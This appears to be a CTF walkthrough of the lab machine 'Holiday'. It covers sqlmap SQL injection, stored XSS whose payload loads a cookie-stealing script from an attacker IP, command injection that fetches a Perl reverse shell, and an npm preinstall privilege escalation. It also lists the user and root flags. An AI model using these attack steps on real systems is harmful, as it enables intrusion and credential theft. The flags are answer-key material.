Holiday

Holiday - 10.10.10.25

Target Enumeration:

OS: Linux
IP: 10.10.10.25
User: 5edc176c52673a6e0f087c68c531c743
Root: a844cb50bf88ebbe8412e095a6b642e8

Ports / Services / Software Versions Running

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
8000/tcp open http Node.js Express framework

Vulnerability Exploited:

SQLi to get users login details
Stored cross site scripting to steal admin cookie
Command injection to gain a perl shell

Privilege Escalation:

User in sudoers group for npm enables preinstall function to execute commands as the root user.

Exploiting the host:

Nmap
Gobuster on port 8000 did not bring anything up first time:
So modify the user agent to look like a browser:
Login page at /login
Test for everything including sqli, capture the login request:
Save as login.req and run sqlmap -r login.req --level=5 --risk=3
Vulnerable to sqli
Dump the whole database:
1
sqlmap -r login.req --level=5 --risk=3 --dump
Copied!
There is a username and what looks like an md5 hash in the database:
Google the hash and it looks like we have been rickrolled
Once logged in it appears to be a booking form.
Check the notes page which are being checked every minute by an administrator so it could be an xss exploit.
Initially found very little on the application so we need to scan it intensively for flaws which also brought back nothing.
Try more advanced XSS with encoding:
Create the following inject.js file:
Encode the following string to inject into the page using http://jdstiles.com/java/cct.html
1
document.write('<script src="http://10.10.14.8/inject.js"></script>');
Copied!
Create the following injection string in notepad (for debugging) and then add this to the page:
Like so:
Set up a nc listener and after 1 minute you should see the following:
Now create the following cookie stealing script called inject.js and host it with python webserver.
Change your nc listener to port 8000
Open a python server listener on port 80 to host your javascript.
Add a new note with the injection string
Wait around 1 minute
Response from nc listener:
Copy the cookie=$data to burp and decode as url and now you have the admin cookie:
Request the /admin page and capture it in burp and send to the repeater:
Now show the response in the browser:
The export tables function allows command execution, ensure you set the admin cookie on the requests:
The application filters out certian characters so use wget and your IP in binary format
This worked.
Lots of tools are missing on this box and we are restricted in what we can use however there is perl on the machine.
Create a perl reverse shell as follows:
Download it to the target system with nc running on port 443
Execute the perl2 payload
Now you have a shell:
Grab the user.txt file
Sudo -l says we can run the following commands as our current user.
Exploit link:
Create the following files locally:
Set up a nc listener on port 444 locally and download the created files to a directory called rimrafall/ in the app dir
Then execute the following command to get root:
1
cd ../
2
sudo npm i rimrafall --unsafe
Copied!
Now you have a root shell so collect the flag.